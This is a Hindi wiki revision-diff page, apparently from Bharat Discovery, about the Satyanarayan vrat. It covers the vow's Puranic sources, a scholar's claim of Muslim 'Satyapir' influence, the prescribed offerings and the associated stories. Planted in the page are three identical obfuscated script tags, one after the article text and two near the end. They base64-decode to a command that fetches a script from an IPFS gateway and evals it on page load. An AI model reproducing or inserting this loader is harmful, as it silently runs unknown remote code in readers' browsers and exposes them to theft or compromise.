Difference between revisions of "सत्यनारायण व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 3: Line 3:
 
*सत्यनारायणव्रत [[भविष्य पुराण]]<ref>भविष्यपुराण प्रतिसर्गपर्व), अध्याय 24-29</ref> में निरूपित है।
 
*सत्यनारायणव्रत [[भविष्य पुराण]]<ref>भविष्यपुराण प्रतिसर्गपर्व), अध्याय 24-29</ref> में निरूपित है।
 
*महामहोपाध्याय [[हरप्रसाद शास्त्री]] ने इसे [[मुसलमान|मुसलमानी]] प्रभाव से आक्रान्त माना है।  
 
*महामहोपाध्याय [[हरप्रसाद शास्त्री]] ने इसे [[मुसलमान|मुसलमानी]] प्रभाव से आक्रान्त माना है।  
*[[स्कन्द पुराण]] के रेवाखण्ड<ref>बंगवासी संस्करण)</ref> में उल्लिखित है कि आरम्भिक काल में (और बहुत से स्थानों पर आज भी) इसे 'सत्यपीर की पूजा' कहा जाता है।
+
*[[स्कन्द पुराण]] के रेवाखण्ड<ref>बंगवासी संस्करण</ref> में उल्लिखित है कि आरम्भिक काल में (और बहुत से स्थानों पर आज भी) इसे 'सत्यपीर की पूजा' कहा जाता है।
*जे. बी. आर. एस.<ref>जे. बी. आर. एस. जिल्द 16, पृ0 328)</ref> में उपर्युक्त लेखक ने कहा है कि 'सीर्नी' की मुस्लिम विधि [[हिन्दू|हिन्दुओं]] के द्वारा सत्यनारायण की कथा में अपनी ली गयी।   
+
*जे. बी. आर. एस.<ref>जे. बी. आर. एस. जिल्द 16, पृ0 328</ref> में उपर्युक्त लेखक ने कहा है कि 'सीर्नी' की मुस्लिम विधि [[हिन्दू|हिन्दुओं]] के द्वारा सत्यनारायण की कथा में अपनी ली गयी।   
 
*यह व्रत आधुनिक [[मध्यम वर्ग]] के लोगों एवं नारियों में अत्यन्त प्रचलित है।  
 
*यह व्रत आधुनिक [[मध्यम वर्ग]] के लोगों एवं नारियों में अत्यन्त प्रचलित है।  
*इस व्रत की कथाओं के लिए<ref>इण्डियन एण्टीक्वेरी (जिल्द 3, पृ0 83-85)</ref> ऐसा आया है कि [[विष्णु]] ने [[नारद]] से इस व्रत का उल्लेख किया था। किसी भी सत्यनारायण की पूजा की जा सकती है।
+
*इस व्रत की कथाओं के लिए<ref>इण्डियन एण्टीक्वेरी (जिल्द 3, पृ0 83-85</ref> ऐसा आया है कि [[विष्णु]] ने [[नारद]] से इस व्रत का उल्लेख किया था। किसी भी सत्यनारायण की पूजा की जा सकती है।
 
*[[नैवेद्य]] सवा सेर या सवा मन; जिसमें [[केला]], [[घृत]], [[दूध]], [[गेहूँ]] का आटा, [[गुड़]] या [[शर्करा]] सम्मलिति रहते हैं; ये सभी मिला दिये जाते हैं; यजमान को कथा सुननी चाहिए और प्रसाद ग्रहण करना चाहिए; [[गीत]], [[नृत्य कला|नृत्य]] एवं [[जागर]] करना चाहिए। तब लोग अपने-अपने घर जाते हैं; इससे सभी कामनाओं की पूर्ति होती है; एक [[ब्राह्मण]], एक लकड़हारे, साध नामक वणिक् एवं उसकी पुत्री [[कलावती]] की कथाएँ सुननी चाहिए।
 
*[[नैवेद्य]] सवा सेर या सवा मन; जिसमें [[केला]], [[घृत]], [[दूध]], [[गेहूँ]] का आटा, [[गुड़]] या [[शर्करा]] सम्मलिति रहते हैं; ये सभी मिला दिये जाते हैं; यजमान को कथा सुननी चाहिए और प्रसाद ग्रहण करना चाहिए; [[गीत]], [[नृत्य कला|नृत्य]] एवं [[जागर]] करना चाहिए। तब लोग अपने-अपने घर जाते हैं; इससे सभी कामनाओं की पूर्ति होती है; एक [[ब्राह्मण]], एक लकड़हारे, साध नामक वणिक् एवं उसकी पुत्री [[कलावती]] की कथाएँ सुननी चाहिए।
 
*इन गाथाओं में सत्यनारायण प्रतिहिंसक एवं [[ईर्ष्यालु]] प्रकट किये गये हैं।
 
*इन गाथाओं में सत्यनारायण प्रतिहिंसक एवं [[ईर्ष्यालु]] प्रकट किये गये हैं।

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • satyanarayanavrat bangal, bihar, uttar pradesh evan maharashtr mean atyant prachalit hai.
  • satyanarayanavrat bhavishy puran[1] mean niroopit hai.
  • mahamahopadhyay haraprasad shastri ne ise musalamani prabhav se akrant mana hai.
  • skand puran ke revakhand[2] mean ullikhit hai ki arambhik kal mean (aur bahut se sthanoan par aj bhi) ise 'satyapir ki pooja' kaha jata hai.
  • je. bi. ar. es.[3] mean uparyukt lekhak ne kaha hai ki 'sirni' ki muslim vidhi hinduoan ke dvara satyanarayan ki katha mean apani li gayi.
  • yah vrat adhunik madhyam varg ke logoan evan nariyoan mean atyant prachalit hai.
  • is vrat ki kathaoan ke lie[4] aisa aya hai ki vishnu ne narad se is vrat ka ullekh kiya tha. kisi bhi satyanarayan ki pooja ki ja sakati hai.
  • naivedy sava ser ya sava man; jisamean kela, ghrit, doodh, gehooan ka ata, gu d ya sharkara sammaliti rahate haian; ye sabhi mila diye jate haian; yajaman ko katha sunani chahie aur prasad grahan karana chahie; git, nrity evan jagar karana chahie. tab log apane-apane ghar jate haian; isase sabhi kamanaoan ki poorti hoti hai; ek brahman, ek lak dahare, sadh namak vanikh evan usaki putri kalavati ki kathaean sunani chahie.
  • in gathaoan mean satyanarayan pratihiansak evan eershyalu prakat kiye gaye haian.
  • ye kathaean skand puran ke revakhand se li gayi kahi gayi haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bhavishyapuran pratisargaparv), adhyay 24-29
  2. bangavasi sanskaran
  3. je. bi. ar. es. jild 16, pri0 328
  4. indiyan entikveri (jild 3, pri0 83-85

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>